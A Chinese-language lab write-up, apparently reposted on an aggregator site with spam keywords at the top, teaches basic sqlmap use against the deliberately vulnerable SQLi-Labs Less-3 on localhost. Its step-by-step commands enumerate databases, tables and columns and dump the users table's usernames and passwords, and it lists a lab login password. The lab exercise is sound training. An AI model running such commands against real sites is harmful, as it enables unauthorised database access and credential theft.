日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 运维知识 > 数据库 >内容正文

数据库

SQL注入-SQLMAP基础使用(十二)

發布時間:2023/12/18 数据库 43 豆豆
生活随笔 收集整理的這篇文章主要介紹了 SQL注入-SQLMAP基础使用(十二) 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

實驗目的
了解SQLMAP的工作原理,熟悉SQLMAP的常用命令,掌握SQLMAP的-u參數的基本使用方法。
實驗環境
攻擊機:吹毀目標

(2)安裝的應用軟件:sqlmap 、Burpsuite 、FireFox瀏覽器及其插件Hackbar、 等

(3)登錄賬號密碼:操作系統帳號Administrator,密碼Sangfor!7890
靶機:司馬華騰
(1)操作系統:本機(建議用虛擬機)不過我太懶了[]~( ̄▽ ̄)~*
(2)安裝的應用軟件:Apache、MySQL(MariaDB)、PHP:DVWA、SQLi-Labs、

webug3.0環境搭建

SQLMAP是一個開源的自動化SQL注入工具,其主要功能是掃描、發現并利用給定的URL的SQL注入漏洞。
SQLMAP的基本功能包括:判斷可注入的參數、判斷可以使用哪一種SQL注入技術進行注入、判斷識別數據庫的類型以及根據用戶的選擇從數據庫中讀取數據。
SQLMAP支持的注入技術包括以下五種:
(1)基于布爾的盲注:根據返回頁面判斷條件真假的注入。
(2)基于時間的盲注:不能根據頁面返回內容判斷任何信息,用條件語句查看
時間延遲語句是否執行(即頁面返回時間是否增加)來判斷。
(3)基于報錯的注入:頁面會返回錯誤信息,或者把注入的語句的結果直接返
回在頁面中。
(4)基于聯合查詢的注入:可以使用UNION的情況下的注入。
(5)堆查詢注入:同時執行多條語句的注入。
SOLMAP支持的數據庫類型主要包括一些關系型數據庫(RMDBS),如
MySQL、Oracle、 PostgresQL、Microsoft SQL Server、 Microsoft Access、IBM
DB2、SQLite、Firebird、Sybase、SAPMaxDB、Informix、HSQLDB等。
實驗步驟

本實驗的目標是:以SQLi-Labs網站的Less-3為入口,利用SQLMAP實施自
動化SQL注入,獲取SQLi-Labs網站的登錄用戶名和密碼。
1.訪間SQLi-Labs網站
在攻擊機Pentest-Atk打開FireFox瀏覽器,并訪問粑機A-SQLi-Labs上的
SQLi-Labs網站Less-3。訪間的URL為:

http://[機IP]/sqli-1abs/less-3/

登錄后,根據網頁提示,先給定一個GET參數,即;

http://127.0.0.1/sqli-labs-master/Less-3/?id=1

此時頁面顯示id=1的用戶名Dump、密碼Dump。

2.啟動SQLMAP
啟動Windows操作系統的命令行工具cmd:鍵入SQLmap路徑

反之于目錄直接cmd亦可

SQLmap的下載和安裝使用教程_Gjqhs的博客-CSDN博客

?使用以下命令啟動SQLMAP幫助:

python sqlmap.py -h

3.尋找注入點
使用以下命令自動尋找網站的注入點,并獲取網站及后臺數據庫的基本信息:
pythonsqimappyu“http://靶機IP]/sqli-1abs/less-3/id=1”

python sqlmap.py -u http://127.0.0.1/sqli-labs-master/Less-3/?id=1

(可根據實際需要)?????????????? 選擇y?????????????????????? /n

檢測結果

?4.獲取所有數據庫的庫名
(1)使用以下命令獲取所有數據庫的庫名:

python sqlmap.py -u http://127.0.0.1/sqli-labs-master/Less-3/?id=1'' --dbs

所有庫名

(2)使用以下命令獲取網站當前所在數據庫的庫名:

python sqlmap.py -u http://127.0.0.1/sqli-labs-master/Less-3/?id=1'' --current-db

?獲取成功

?檢測結果:網站當前所在數據庫的庫名為security。

5.獲取security數據庫中所有的表名
使用以下命令獲取security數據庫中所有的表名:

python sqlmap.py -u http://127.0.0.1/sqli-labs-master/Less-3/?id=1'' -D security --tables

檢測結果:security數據庫中含有emails、referers、uagents、users四張表。

其中,有一個名為users的表,這當中往往存放著網站用戶的基本信息。

6.獲取users表的全部字段名
使用以下命令獲取users表的全部字段名

python sqlmap.py -u http://127.0.0.1/sqli-labs-master/Less-3/?id=1'' -D security -T users --columns

?檢測結果:users表中有三個字段id、username和password。

7.獲取users表id、username和password字段的全部值
使用以下命令獲取users表id、username和password字段的全部值

python sqlmap.py -u http://127.0.0.1/sqli-labs-master/Less-3/?id=1'' -D security -T users -C id,username,password --dump

?檢測結果如下圖所示:

?實驗結束,你學廢了嗎

這不趁熱再來幾個

SQL注入 ——sql數據庫操作基礎(一)_Gjqhs的博客-CSDN博客

SQL注入-二階注入(十)_Gjqhs的博客-CSDN博客

SQL注入-寬字節注入(十一)(面試熱點)_Gjqhs的博客-CSDN博客

...

更多包括而不限于SQL注入的文章,關注我全部帶走吧( ?? ω ?? )?

總結

以上是生活随笔為你收集整理的SQL注入-SQLMAP基础使用(十二)的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。